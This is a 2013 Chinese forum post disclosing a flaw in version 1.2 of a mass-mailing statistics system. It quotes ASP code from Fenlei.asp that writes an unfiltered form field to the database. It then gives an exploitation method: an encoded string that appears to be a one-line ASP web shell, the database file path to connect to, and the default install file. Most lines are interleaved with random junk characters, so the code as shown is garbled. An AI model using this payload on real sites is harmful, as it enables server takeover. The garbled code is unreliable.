找回密码
 立即注册
查看: 2838|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ! F  i/ C, m' t5 X0 W, J  i

2 r9 g2 }9 H! V6 u% pIF Request.QueryString("Action")="del" Then ; |1 G1 v( ?, X
ID=Request.QueryString("ID")
7 m8 w( @1 u0 Y. d5 {IF Countss ("tui","Fenlei",ID )<>0 then 9 w8 o: C8 R' d5 f
'略 & b' B% a% Z4 q& L: U
IF Request.QueryString("Action")="Add" Then 0 A! V, s8 d8 y& D4 a
Tname=Request.Form("Typename") 1 e% S1 I1 F6 N/ H+ Q& z% ]: E  M- l
Set Rs=Server.CreateObject("adodb.Recordset")
! Q6 w7 K+ p4 {7 G3 H  }6 tSql="Select * From Fenlei Order by id Desc "
5 a' {. k: Z  HRs.Open Sql,Conn,1,3
+ [  r4 U4 _4 Y/ d- x# MRs.Addnew
0 r3 N) @2 O# d  v9 C; V& k) RRs("Typename")=Tname ( H" z8 P/ Z$ O
'略 " l3 P; p$ \5 Y) ^3 }+ G% b/ b
Set Rs=Server.CreateObject("adodb.Recordset")
" Y/ e1 S/ P) ^4 eSql="Select * From Fenlei Order by id Desc "
0 y0 U2 c: p7 @  B7 vRs.Open Sql,Conn,1,1 ' c" S$ _6 k& `( r& i+ j
'略 $ h5 G) V3 G/ z0 ], N
%>! m, N9 O& Y2 w
5 N; a0 @0 ^9 c2 b" Z. _1 f3 t
2 z7 F4 s" ]7 o! D) g6 [
5 d; l- p2 ~- ?; J! Q, [8 d
没有过滤,直接写入数据库。% S8 G/ W/ {% A! W# i7 N
- b' C& \( W# q3 c5 o, Y
利用方法:
2 l0 A  W9 O: g! L5 _ 9 ~2 v( i; T, r. O2 X- n, N
插入:┼攠數畣整爠煥敵瑳∨≡┩>1 ~+ D- p# f: v9 @1 k/ G
8 g. x0 ^0 S# c3 Z( w  I/ g

) B# `) Z0 ?. [- _连接: http://www.xxx.com/###tongbaner.asa
! p& V$ G# `# n+ I' N'默认安装文件: . b' J1 d& ^5 z2 H5 a8 x4 }
'install.asp% N' V# d8 ]5 U( I& u. e, G0 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表